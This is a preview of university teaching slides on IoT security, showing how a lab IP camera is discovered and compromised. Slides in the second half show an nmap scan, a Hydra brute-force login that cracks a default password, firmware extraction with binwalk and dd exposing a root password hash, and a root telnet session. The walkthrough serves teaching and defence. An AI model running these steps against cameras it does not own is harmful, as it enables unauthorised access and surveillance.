View
218
Download
1
Category
Preview:
Citation preview
Author: Prof Bill Buchanan
IoT Security Internet of Things
Computer Architecture
IP Camera Discovery
Author: Prof Bill Buchanan
Web: Asecuritysite.com
Author: Prof Bill Buchanan
IoT
Se
curi
ty
Introduction
Intr
oduction
IoT
Security
Traditional connecting of “things”
Author: Prof Bill Buchanan
Computers: (Windows XP/7/8),
Mac OS X
Servers: (Windows 2008, Linux)
Wired connections
Internet
connection
Arc
hitectu
reIo
T S
ecu
rity
IoT
Author: Prof Bill Buchanan
Servers (Linux, Windows 2008,
etc)
Computers: (Windows XP/7/8),
Mac OS X
CPU (Intel
x86, Intel
x64)
Eg 3GHz
Dynamic
Memory
(16GB)
Storage (1TB)
NVRAM
(4MB)
ROM
(24KB)
SDRAM
(256MB)
CPU (MIPS
24K V4.12
@384 MHz)
Embedded device
Features:
Highly secure.
Unique passwords.
No default passwords.
Firewalls/IDS/etc.
Auto patches.
Well tested.
NVRAM
(16GB)
ARM (Cortex-
A15 CPU -
ARMv7)/
Qualcomm
Snapdragon
(ARMv8)
Smart phone
1 2 3 4
ARMv7/ARMv8: Quad-core: 1.7GHz
Devices: Embedded OS
Author: Prof Bill Buchanan
IoT
Se
curi
ty
Introduction to Computer
Architecture
Author: Prof Bill Buchanan
IoT
Se
curi
ty
IP Camera
IP C
am
era
IoT
Se
cu
rity
IP Camera Architecture
Author: Prof Bill Buchanan
Ralink MIPS
24K V4.12
384MHz
Linux version 2.6.21
Web
server
Telnetd
HTTP (80)
Telnet (23)
BusyBox
BIN
BusyBox (300 commands, L/W Linux))
Firmware (NVRAM)
Ethernet (DHCP)
IP C
am
era
IoT
Security
Author: Prof Bill Buchanan
Ralink MIPS
24K V4.12
384MHz
Linux version 2.6.21
Web
server
Telnetd
HTTP (80)
Telnet (23)
BusyBox
Ethernet (DHCP)
Device Status
Device Firmware Version 51.3.0.152
Device Embeded Web UI Version 0.0.1.6
Alias IPCAM
MAC 78:A5:DD:08:FC:DC
Wifi MAC 78:A5:DD:08:FC:DD
Method:
1. NMAP ports (192.168.0.2).
2. Try manual login (HTTP and Telnet).
3. Hydra login (HTTP and Telnet).
4. Kali – View BIN – binwalk 51.3.0.152.bin
5. Kali – Extract System - dd bs=1 skip=36 if=51.3.0.152.bin of=image.zip
6. Kali – unzip image.zip … review for Admin password
7. XSS Vulnerability.
IP Camera Architecture
IP C
am
era
IoT
Se
cu
rity
Author: Prof Bill Buchanan
Ralink MIPS
24K V4.12
384MHz
Linux version 2.6.21
Web
server
Telnetd
HTTP (80)
Telnet (23)
BusyBox
Ethernet (DHCP)
root@kali:~/system/system/bin# nmap 192.168.0.2
Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-04 12:52 GMT
Nmap scan report for Unknown (192.168.0.2)
Host is up (0.0062s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
8600/tcp open asterix
MAC Address: 78:A5:DD:08:FC:DC (Shenzhen Smarteye Digital Electronics Co.)
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
IP Camera Architecture
IP C
am
era
IoT
Se
cu
rity
Author: Prof Bill Buchanan
Ralink MIPS
24K V4.12
384MHz
Linux version 2.6.21
Web
server
Telnetd
HTTP (80)
Telnet (23)
BusyBox
Ethernet (DHCP)
billbuchanan@Bills-MacBook-Pro:~/webcam$ hydra -V -W 1 -t 1 -L user.txt -P
pass.txt 192.168.0.2 http
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2015-01-04 12:59:18
[WARNING] The service http has been replaced with http-head and http-get, using by
default GET method. Same for https.
[WARNING] You must supply the web page as an additional option or via -m, default
path set to /
[DATA] 1 task, 1 server, 30 login tries (l:5/p:6), ~30 tries per task
[DATA] attacking service http-get on port 80
[ATTEMPT] target 192.168.0.2 - login "root" - pass "password" - 1 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "root" - pass "default" - 2 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "root" - pass "none" - 3 of 30 [child 0]
...
[ATTEMPT] target 192.168.0.2 - login "admin" - pass "123" - 16 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "admin" - pass "12345" - 17 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "admin" - pass "123456" - 18 of 30 [child 0]
[80][www] host: 192.168.0.2 login: admin password: 123456
[ATTEMPT] target 192.168.0.2 - login "user" - pass "password" - 19 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "user" - pass "default" - 20 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "user" - pass "none" - 21 of 30 [child 0]
IP Camera Architecture
IP C
am
era
IoT
Security
Author: Prof Bill Buchanan
root@kali:~# binwalk 51.3.0.152.bin
DECIMAL HEX DESCRIPTION
-------------------------------------------------------------------------------------------------------------------
36 0x24 Zip archive data, at least v1.0 to extract, name: "system/"
101 0x65 Zip archive data, at least v1.0 to extract, name: "system/Wireless/"
175 0xAF Zip archive data, at least v1.0 to extract, name: "system/system/"
247 0xF7 Zip archive data, at least v1.0 to extract, name: "system/system/drivers/"
327 0x147 Zip archive data, at least v1.0 to extract, name: "system/system/bin/"
403 0x193 Zip archive data, at least v2.0 to extract, compressed size: 25717, uncompressed size: 108204, name: "system/
system/bin/daemon.v5.5"
26207 0x665F Zip archive data, at least v2.0 to extract, compressed size: 167785, uncompressed size: 685920, name: "system/
system/bin/mailx"
194073 0x2F619 Zip archive data, at least v2.0 to extract, compressed size: 238464, uncompressed size: 780068, name: "system/
system/bin/encoder"
432620 0x699EC Zip archive data, at least v2.0 to extract, compressed size: 3106, uncompressed size: 8372, name: "system/system/bin/
gmail_thread"
435814 0x6A666 Zip archive data, at least v2.0 to extract, compressed size: 3075, uncompressed size: 8260, name: "system/system/bin/
cmd_thread"
438975 0x6B2BF Zip archive data, at least v2.0 to extract, compressed size: 13149, uncompressed size: 45876, name: "system/system/
bin/ssmtp"
452205 0x6E66D Zip archive data, at least v2.0 to extract, compressed size: 24681, uncompressed size: 104800, name: "system/system/
bin/daemon.v5.3"
476973 0x7472D Zip archive data, at least v2.0 to extract, compressed size: 84641, uncompressed size: 170920, name: "system/system/
bin/unzip1"
561696 0x89220 Zip archive data, at least v2.0 to extract, compressed size: 15429, uncompressed size: 43616, name: "system/system/
bin/upnpc-static"
577213 0x8CEBD Zip archive data, at least v2.0 to extract, compressed size: 35607, uncompressed size: 95132, name: "system/system/
bin/ftp"
612899 0x95A23 Zip archive data, at least v1.0 to extract, name: "system/system/lib/"
612975 0x95A6F Zip archive data, at least v1.0 to extract, name: "system/www/"
613044 0x95AB4 Zip archive data, at least v1.0 to extract, name: "system/init/"
613114 0x95AFA Zip archive data, at least v2.0 to extract, compressed size: 99, uncompressed size: 203, name: "system/init/ipcam.sh"
615021 0x9626D End of Zip archive
Examining firmware
root@kali:~# cat daemon.v5.5
ps > /tmp/gps.txt/tmp/gps.txtrfopen failed
encoderreboot/system/system/bin/encoder &/etc/passwdwbroot:LSiuY7pOmZG2s:0:0:Adminstrator:/:/bin/sh/etc/
grouproot:x:0:adminsystem:%2x-%2x-%2x
this isn't system file
IP C
am
era
IoT
Security
Author: Prof Bill Buchanan
Ralink MIPS
24K V4.12
384MHz
Linux version 2.6.21
Web
server
Telnetd
HTTP (80)
Telnet (23)
BusyBox
Ethernet (DHCP)billbuchanan@Bills-MacBook-Pro:~/webcam$ telnet 192.168.0.2
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
(none) login: root
Password: 123456
BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# ls
var tmp sys proc mnt lib home etc bin
usr system sbin param media init etc_ro dev
# cd system
# ls
system daemon Wireless init www
# cd www
# ls
mime.types config.htm ftp.htm
status.htm Deutsch jpeg.html
user.htm index1.htm snapshot.htm
traditional_chinese test_mail.htm alias.htm
ip.htm system-b.ini appversion.txt
french recordplay.htm sensordata.bin
upnp.htm params_backup.cgi ptz.htm
ap.htm multidev.htm recordsch.htm
IP Camera Telnet connection
IP C
am
era
IoT
Se
cu
rity
IP Camera Architecture
Author: Prof Bill Buchanan
Ralink MIPS
24K V4.12
384MHz
Linux version 2.6.21
Web
server
Telnetd
HTTP (80)
Telnet (23)
BusyBox
BIN
BusyBox (300 commands, L/W Linux))
Firmware (NVRAM)
Ethernet (DHCP)
Author: Prof Bill Buchanan
IoT Security Internet of Things
Computer Architecture
IP Camera Discovery
Author: Prof Bill Buchanan
Web: Asecuritysite.com
Recommended